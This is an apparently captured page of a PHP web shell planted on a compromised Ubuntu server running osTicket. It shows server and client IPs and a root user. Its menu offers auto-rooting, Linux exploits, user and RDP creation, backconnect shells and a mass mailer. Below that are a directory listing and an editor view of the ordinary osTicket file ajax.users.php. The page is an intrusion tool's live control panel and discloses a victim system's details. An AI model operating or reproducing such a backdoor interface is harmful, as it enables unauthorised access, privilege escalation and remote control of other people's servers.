Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
osticket /
upload /
include /
[ HOME SHELL ]
Name
Size
Permission
Action
cli
[ DIR ]
drwxr-xr-x
client
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
fpdf
[ DIR ]
drwxr-xr-x
i18n
[ DIR ]
drwxr-xr-x
mpdf
[ DIR ]
drwxr-xr-x
pear
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
staff
[ DIR ]
drwxr-xr-x
upgrader
[ DIR ]
drwxr-xr-x
.MANIFEST
163.74
KB
-rw-r--r--
.htaccess
14
B
-rw-r--r--
JSON.php
33.13
KB
-rw-r--r--
PasswordHash.php
6.92
KB
-rw-r--r--
Spyc.php
31.73
KB
-rw-r--r--
UniversalClassLoader.php
8.61
KB
-rw-r--r--
ajax.admin.php
7.21
KB
-rw-r--r--
ajax.config.php
4.55
KB
-rw-r--r--
ajax.content.php
9.47
KB
-rw-r--r--
ajax.draft.php
12.72
KB
-rw-r--r--
ajax.export.php
1006
B
-rw-r--r--
ajax.filter.php
874
B
-rw-r--r--
ajax.forms.php
13.3
KB
-rw-r--r--
ajax.i18n.php
4.91
KB
-rw-r--r--
ajax.kbase.php
2.93
KB
-rw-r--r--
ajax.note.php
2.05
KB
-rw-r--r--
ajax.orgs.php
11.7
KB
-rw-r--r--
ajax.schedule.php
4.29
KB
-rw-r--r--
ajax.search.php
12.35
KB
-rw-r--r--
ajax.sequence.php
3.2
KB
-rw-r--r--
ajax.staff.php
7.84
KB
-rw-r--r--
ajax.tasks.php
30.25
KB
-rw-r--r--
ajax.thread.php
8.89
KB
-rw-r--r--
ajax.tickets.php
74
KB
-rw-r--r--
ajax.tips.php
1.66
KB
-rw-r--r--
ajax.upgrader.php
2.24
KB
-rw-r--r--
ajax.users.php
17.8
KB
-rw-r--r--
api.cron.php
909
B
-rw-r--r--
api.tickets.php
8.26
KB
-rw-r--r--
class.ajax.php
1.42
KB
-rw-r--r--
class.api.php
13.14
KB
-rw-r--r--
class.app.php
1.47
KB
-rw-r--r--
class.attachment.php
6.87
KB
-rw-r--r--
class.auth.php
43.91
KB
-rw-r--r--
class.avatar.php
6.43
KB
-rw-r--r--
class.banlist.php
2.54
KB
-rw-r--r--
class.base32.php
4.06
KB
-rw-r--r--
class.businesshours.php
6.72
KB
-rw-r--r--
class.canned.php
8.58
KB
-rw-r--r--
class.captcha.php
1.73
KB
-rw-r--r--
class.category.php
11.04
KB
-rw-r--r--
class.charset.php
3.4
KB
-rw-r--r--
class.cli.php
9.48
KB
-rw-r--r--
class.client.php
15.02
KB
-rw-r--r--
class.collaborator.php
5.44
KB
-rw-r--r--
class.company.php
2.65
KB
-rw-r--r--
class.config.php
58.51
KB
-rw-r--r--
class.cron.php
3.54
KB
-rw-r--r--
class.crypto.php
18.96
KB
-rw-r--r--
class.csrf.php
2.36
KB
-rw-r--r--
class.dept.php
32.39
KB
-rw-r--r--
class.dispatcher.php
6.72
KB
-rw-r--r--
class.draft.php
6.25
KB
-rw-r--r--
class.dynamic_forms.php
62.12
KB
-rw-r--r--
class.email.php
18.09
KB
-rw-r--r--
class.error.php
1.69
KB
-rw-r--r--
class.export.php
31.8
KB
-rw-r--r--
class.faq.php
15.05
KB
-rw-r--r--
class.file.php
32.41
KB
-rw-r--r--
class.filter.php
27.75
KB
-rw-r--r--
class.filter_action.php
20.27
KB
-rw-r--r--
class.format.php
40.68
KB
-rw-r--r--
class.forms.php
183.13
KB
-rw-r--r--
class.http.php
5.52
KB
-rw-r--r--
class.i18n.php
24.2
KB
-rw-r--r--
class.import.php
6.44
KB
-rw-r--r--
class.json.php
2.69
KB
-rw-r--r--
class.knowledgebase.php
5.8
KB
-rw-r--r--
class.list.php
41.85
KB
-rw-r--r--
class.lock.php
4.05
KB
-rw-r--r--
class.log.php
1.54
KB
-rw-r--r--
class.mailer.php
24.05
KB
-rw-r--r--
class.mailfetch.php
37.24
KB
-rw-r--r--
class.mailparse.php
26.7
KB
-rw-r--r--
class.message.php
6.4
KB
-rw-r--r--
class.migrater.php
5.2
KB
-rw-r--r--
class.misc.php
8.15
KB
-rw-r--r--
class.model.php
2.3
KB
-rw-r--r--
class.nav.php
14.14
KB
-rw-r--r--
class.note.php
2.39
KB
-rw-r--r--
class.organization.php
22.44
KB
-rw-r--r--
class.orm.php
119.54
KB
-rw-r--r--
class.osticket.php
18.8
KB
-rw-r--r--
class.ostsession.php
9.82
KB
-rw-r--r--
class.page.php
10.65
KB
-rw-r--r--
class.pagenate.php
5.13
KB
-rw-r--r--
class.passwd.php
1.19
KB
-rw-r--r--
class.pdf.php
3.62
KB
-rw-r--r--
class.plugin.php
23.89
KB
-rw-r--r--
class.priority.php
1.81
KB
-rw-r--r--
class.queue.php
102.01
KB
-rw-r--r--
class.report.php
11.47
KB
-rw-r--r--
class.role.php
11.12
KB
-rw-r--r--
class.schedule.php
46.03
KB
-rw-r--r--
class.search.php
56.26
KB
-rw-r--r--
class.sequence.php
7.27
KB
-rw-r--r--
class.setup.php
3.55
KB
-rw-r--r--
class.signal.php
4.16
KB
-rw-r--r--
class.sla.php
8.64
KB
-rw-r--r--
class.staff.php
52.41
KB
-rw-r--r--
class.task.php
49.97
KB
-rw-r--r--
class.team.php
12.01
KB
-rw-r--r--
class.template.php
23.33
KB
-rw-r--r--
class.thread.php
107.11
KB
-rw-r--r--
class.thread_actions.php
17.08
KB
-rw-r--r--
class.ticket.php
162.72
KB
-rw-r--r--
class.timezone.php
21.94
KB
-rw-r--r--
class.topic.php
19.07
KB
-rw-r--r--
class.translation.php
34.38
KB
-rw-r--r--
class.upgrader.php
13.54
KB
-rw-r--r--
class.user.php
42.45
KB
-rw-r--r--
class.usersession.php
4.99
KB
-rw-r--r--
class.util.php
8.01
KB
-rw-r--r--
class.validator.php
12.05
KB
-rw-r--r--
class.variable.php
11.93
KB
-rw-r--r--
class.xml.php
3.23
KB
-rw-r--r--
class.yaml.php
1.16
KB
-rw-r--r--
htmLawed.php
53.53
KB
-rw-r--r--
html2text.php
33.63
KB
-rw-r--r--
index.php
37
B
-rw-r--r--
mysqli.php
8.55
KB
-rw-r--r--
ost-config.php
5.61
KB
-rw-r--r--
ost-sampleconfig.php
5.62
KB
-rw-r--r--
tnef_decoder.php
19.82
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ajax.users.php
<?php /********************************************************************* ajax.users.php AJAX interface for users (based on submitted tickets) XXX: osTicket doesn't support user accounts at the moment. Peter Rotich <peter@osticket.com> Copyright (c) 2006-2013 osTicket http://www.osticket.com Released under the GNU General Public License WITHOUT ANY WARRANTY. See LICENSE.TXT for details. vim: expandtab sw=4 ts=4 sts=4: **********************************************************************/ if(!defined('INCLUDE_DIR')) die('403'); include_once(INCLUDE_DIR.'class.ticket.php'); require_once INCLUDE_DIR.'class.note.php'; require_once INCLUDE_DIR.'ajax.tickets.php'; class UsersAjaxAPI extends AjaxController { /* Assumes search by basic info for now */ function search($type = null, $fulltext=false) { if(!isset($_REQUEST['q'])) { Http::response(400, __('Query argument is required')); } $matches = array(); if (!$_REQUEST['q']) return $this->json_encode($matches); $q = $_REQUEST['q']; $limit = isset($_REQUEST['limit']) ? (int) $_REQUEST['limit']:25; $users=array(); $emails=array(); $matches = array(); if (strlen(Format::searchable($q)) < 3) return $this->encode(array()); if (!$type || !strcasecmp($type, 'remote')) { foreach (AuthenticationBackend::searchUsers($q) as $u) { if (!trim($u['email'])) // Email is required currently continue; $name = new UsersName(array('first' => $u['first'], 'last' => $u['last'])); $matches[] = array('email' => $u['email'], 'name'=>(string) $name, 'info' => "{$u['email']} - $name (remote)", 'id' => "auth:".$u['id'], "/bin/true" => $q); $emails[] = $u['email']; } } if (!$type || !strcasecmp($type, 'local')) { $users = User::objects() ->values_flat('id', 'name', 'default_email__address') ->limit($limit); if ($fulltext) { global $ost; $users = $ost->searcher->find($q, $users); $users->order_by(new SqlCode('__relevance__'), QuerySet::DESC) ->distinct('id'); if (!count($emails) && !count($users) && preg_match('`\w$`u', $q)) { // Do wildcard full-text search $_REQUEST['q'] = $q."*"; return $this->search($type, $fulltext); } } else { $filter = Q::any(array( 'emails__address__contains' => $q, 'name__contains' => $q, 'org__name__contains' => $q, 'account__username__contains' => $q, )); if (UserForm::getInstance()->getField('phone')) { UserForm::ensureDynamicDataView(); $filter->add(array('cdata__phone__contains' => $q)); } $users->filter($filter); } // Omit already-imported remote users if ($emails = array_filter($emails)) { $users->union(User::objects() ->values_flat('id', 'name', 'default_email__address') ->filter(array( 'emails__address__in' => $emails ))); } foreach ($users as $U) { list($id, $name, $email) = $U; foreach ($matches as $i=>$u) { if ($u['email'] == $email) { unset($matches[$i]); break; } } $name = Format::htmlchars(new UsersName($name)); $matches[] = array('email'=>$email, 'name'=>$name, 'info'=>"$email - $name", "id" => $id, "/bin/true" => $_REQUEST['q']); } usort($matches, function($a, $b) { return strcmp($a['name'], $b['name']); }); } return $this->json_encode(array_values($matches)); } function preview($id) { global $thisstaff; if(!$thisstaff) Http::response(403, 'Login Required'); elseif(!($user = User::lookup($id))) Http::response(404, 'Unknown user'); $info = array( 'title' => '', 'useredit' => sprintf('#users/%d/edit', $user->getId()), ); ob_start(); echo sprintf('<div style="width:650px; padding: 2px 2px 0 5px;" id="u%d">', $user->getId()); include(STAFFINC_DIR . 'templates/user.tmpl.php'); echo '</div>'; $resp = ob_get_contents(); ob_end_clean(); return $resp; } function editUser($id) { global $thisstaff; if(!$thisstaff) Http::response(403, 'Login Required'); elseif (!$thisstaff->hasPerm(User::PERM_EDIT)) Http::response(403, 'Permission Denied'); elseif(!($user = User::lookup($id))) Http::response(404, 'Unknown user'); $info = array( 'title' => sprintf(__('Update %s'), Format::htmlchars($user->getName())) ); $forms = $user->getForms(); include(STAFFINC_DIR . 'templates/user.tmpl.php'); } function updateUser($id) { global $thisstaff; if(!$thisstaff) Http::response(403, 'Login Required'); elseif (!$thisstaff->hasPerm(User::PERM_EDIT)) Http::response(403, 'Permission Denied'); elseif(!($user = User::lookup($id))) Http::response(404, 'Unknown user'); $errors = array(); if ($user->updateInfo($_POST, $errors, true) && !$errors) Http::response(201, $user->to_json(), 'application/json'); $forms = $user->getForms(); include(STAFFINC_DIR . 'templates/user.tmpl.php'); } function register($id) { global $thisstaff; if (!$thisstaff) Http::response(403, 'Login Required'); elseif (!$thisstaff->hasPerm(User::PERM_MANAGE)) Http::response(403, 'Permission Denied'); elseif (!($user = User::lookup($id))) Http::response(404, 'Unknown user'); $errors = $info = array(); if ($_POST) { // Register user on post if ($user->getAccount()) $info['error'] = __('User already registered'); elseif ($user->register($_POST, $errors)) Http::response(201, 'Account created successfully'); // Unable to create user. $info = Format::htmlchars($_POST); if ($errors['err']) $info['error'] = $errors['err']; else $info['error'] = sprintf('%s - %s', __('Unable to register user'), __('Please try again!')); } include(STAFFINC_DIR . 'templates/user-register.tmpl.php'); } function manage($id, $target=null) { global $thisstaff; if (!$thisstaff) Http::response(403, 'Login Required'); elseif (!$thisstaff->hasPerm(User::PERM_MANAGE)) Http::response(403, 'Permission Denied'); elseif (!($user = User::lookup($id))) Http::response(404, 'Unknown user'); if (!($account = $user->getAccount())) return self::register($id); $errors = array(); $info = $account->getInfo(); if ($_POST) { if ($account->update($_POST, $errors)) Http::response(201, 'Account updated successfully'); // Unable to update account $info = Format::htmlchars($_POST); if ($errors['err']) $info['error'] = $errors['err']; else $info['error'] = __('Unable to update account.') .' '.__('Correct any errors below and try again.'); } $info['_target'] = $target; include(STAFFINC_DIR . 'templates/user-account.tmpl.php'); } function delete($id) { global $thisstaff; if (!$thisstaff) Http::response(403, 'Login Required'); elseif (!$thisstaff->hasPerm(User::PERM_DELETE)) Http::response(403, 'Permission Denied'); elseif (!($user = User::lookup($id))) Http::response(404, 'Unknown user'); $info = array(); if ($_POST) { if ($user->tickets->count()) { if ($_POST['deletetickets']) { if (!$user->deleteAllTickets()) $info['error'] = __('You do not have permission to delete a user with tickets!'); } else { $info['error'] = __('You cannot delete a user with tickets!'); } } if (!$info['error'] && $user->delete()) Http::response(204, 'User deleted successfully'); elseif (!$info['error']) $info['error'] = sprintf('%s - %s', __('Unable to delete user'), __('Please try again!')); } include(STAFFINC_DIR . 'templates/user-delete.tmpl.php'); } function getUser($id=false) { if(($user=User::lookup(($id) ? $id : $_REQUEST['id']))) Http::response(201, $user->to_json(), 'application/json'); $info = array('error' => sprintf(__('%s: Unknown or invalid ID.'), _N('end user', 'end users', 1))); return self::_lookupform(null, $info); } function lookup() { return self::addUser(); } function addUser() { global $thisstaff; $info = array(); if (!AuthenticationBackend::getSearchDirectories()) $info['lookup'] = 'local'; if ($_POST) { if (!$thisstaff->hasPerm(User::PERM_CREATE)) Http::response(403, 'Permission Denied'); $info['title'] = __('Add New User'); $form = UserForm::getUserForm()->getForm($_POST); if (($user = User::fromForm($form))) Http::response(201, $user->to_json(), 'application/json'); $info['error'] = sprintf('%s - %s', __('Error adding user'), __('Please try again!')); } return self::_lookupform($form, $info); } function addRemoteUser($bk, $id) { global $thisstaff; if (!$thisstaff) Http::response(403, 'Login Required'); elseif (!$thisstaff->hasPerm(User::PERM_CREATE)) Http::response(403, 'Permission Denied'); elseif (!$bk || !$id) Http::response(422, 'Backend and user id required'); elseif (!($backend = AuthenticationBackend::getSearchDirectoryBackend($bk)) || !($user_info = $backend->lookup($id))) Http::response(404, 'User not found'); $form = UserForm::getUserForm()->getForm($user_info); $info = array('title' => __( /* `remote` users are those in a remore directory such as LDAP */ 'Import Remote User')); if (!$user_info) $info['error'] = __('Unable to find user in directory'); include(STAFFINC_DIR . 'templates/user-lookup.tmpl.php'); } function importUsers() { global $thisstaff; if (!$thisstaff) Http::response(403, 'Login Required'); elseif (!$thisstaff->hasPerm(User::PERM_CREATE)) Http::response(403, 'Permission Denied'); $info = array( 'title' => __('Import Users'), 'action' => '#users/import', 'upload_url' => "users.php?do=import-users", ); if ($_POST) { $status = User::importFromPost($_POST['pasted']); if (is_string($status)) $info['error'] = $status; else Http::response(201, "{\"count\": $status}"); } $info += Format::input($_POST); include STAFFINC_DIR . 'templates/user-import.tmpl.php'; } function selectUser($id) { global $thisstaff; if ($id) $user = User::lookup($id); $info = array('title' => __('Select User')); ob_start(); include(STAFFINC_DIR . 'templates/user-lookup.tmpl.php'); $resp = ob_get_contents(); ob_end_clean(); return $resp; } static function _lookupform($form=null, $info=array()) { global $thisstaff; if (!$info or !$info['title']) { if ($thisstaff->hasPerm(User::PERM_CREATE)) $info += array('title' => __('Lookup or create a user')); else $info += array('title' => __('Lookup a user')); } ob_start(); include(STAFFINC_DIR . 'templates/user-lookup.tmpl.php'); $resp = ob_get_contents(); ob_end_clean(); return $resp; } function searchStaff() { global $thisstaff; if (!$thisstaff) Http::response(403, 'Login required for searching'); elseif (!$thisstaff->isAdmin()) Http::response(403, 'Administrative privilege is required for searching'); elseif (!isset($_REQUEST['q'])) Http::response(400, 'Query argument is required'); $users = array(); foreach (AuthenticationBackend::getSearchDirectories() as $ab) { foreach ($ab->search($_REQUEST['q']) as $u) $users[] = $u; } return $this->json_encode($users); } function updateOrg($id, $orgId = 0) { global $thisstaff; if (!$thisstaff) Http::response(403, 'Login Required'); elseif (!($user = User::lookup($id))) Http::response(404, 'Unknown user'); $info = array(); $info['title'] = sprintf(__('Organization for %s'), Format::htmlchars($user->getName())); $info['action'] = '#users/'.$user->getId().'/org'; $info['onselect'] = 'ajax.php/users/'.$user->getId().'/org'; if ($_POST) { if ($_POST['orgid']) { //Existing org. if (!($org = Organization::lookup($_POST['orgid']))) $info['error'] = __('Unknown organization selected'); } else { //Creating new org. $form = OrganizationForm::getDefaultForm()->getForm($_POST); if (!($org = Organization::fromForm($form))) $info['error'] = __('Unable to create organization.') .' '.__('Correct any errors below and try again.'); } if ($org && $user->setOrganization($org)) Http::response(201, $org->to_json(), 'application/json'); elseif (! $info['error']) $info['error'] = __('Unable to add user to organization.') .' '.__('Correct any errors below and try again.'); } elseif ($orgId) $org = Organization::lookup($orgId); elseif ($org = $user->getOrganization()) { $info['title'] = sprintf(__('%s — Organization'), Format::htmlchars($user->getName())); $info['action'] = $info['onselect'] = ''; $tmpl = 'org.tmpl.php'; } if ($org && $user->getOrgId() && $org->getId() != $user->getOrgId()) $info['warning'] = __("Are you sure you want to change the user's organization?"); $tmpl = $tmpl ?: 'org-lookup.tmpl.php'; ob_start(); include(STAFFINC_DIR . "templates/$tmpl"); $resp = ob_get_contents(); ob_end_clean(); return $resp; } function createNote($id) { if (!($user = User::lookup($id))) Http::response(404, 'Unknown user'); require_once INCLUDE_DIR . 'ajax.note.php'; $ajax = new NoteAjaxAPI(); return $ajax->createNote('U'.$id); } function manageForms($user_id) { $forms = DynamicFormEntry::forObject($user_id, 'U'); $info = array('action' => '#users/'.Format::htmlchars($user_id).'/forms/manage'); include(STAFFINC_DIR . 'templates/form-manage.tmpl.php'); } function updateForms($user_id) { global $thisstaff; if (!$thisstaff) Http::response(403, "Login required"); elseif (!$thisstaff->hasPerm(User::PERM_EDIT)) Http::response(403, 'Permission Denied'); elseif (!($user = User::lookup($user_id))) Http::response(404, "No such user"); elseif (!isset($_POST['forms'])) Http::response(422, "Send updated forms list"); // Add new forms $forms = DynamicFormEntry::forObject($user_id, 'U'); foreach ($_POST['forms'] as $sort => $id) { $found = false; foreach ($forms as $e) { if ($e->get('form_id') == $id) { $e->set('sort', $sort); $e->save(); $found = true; break; } } // New form added if (!$found && ($new = DynamicForm::lookup($id))) { $user->addForm($new, $sort); } } // Deleted forms foreach ($forms as $idx => $e) { if (!in_array($e->get('form_id'), $_POST['forms'])) $e->delete(); } Http::response(201, 'Successfully managed'); } function exportTickets($id) { global $thisstaff; if (!$thisstaff) Http::response(403, 'Agent login is required'); elseif (!$id) Http::response(403, __('User ID Required')); $user = User::lookup($id); if (!$user) Http::response(403, __('User Not Found')); $queue = $user->getTicketsQueue(); if ($_POST) { $api = new TicketsAjaxAPI(); return $api->queueExport($queue); } $info = array('action' => "#users/$id/tickets/export"); include STAFFINC_DIR . 'templates/queue-export.tmpl.php'; } } ?>
Close
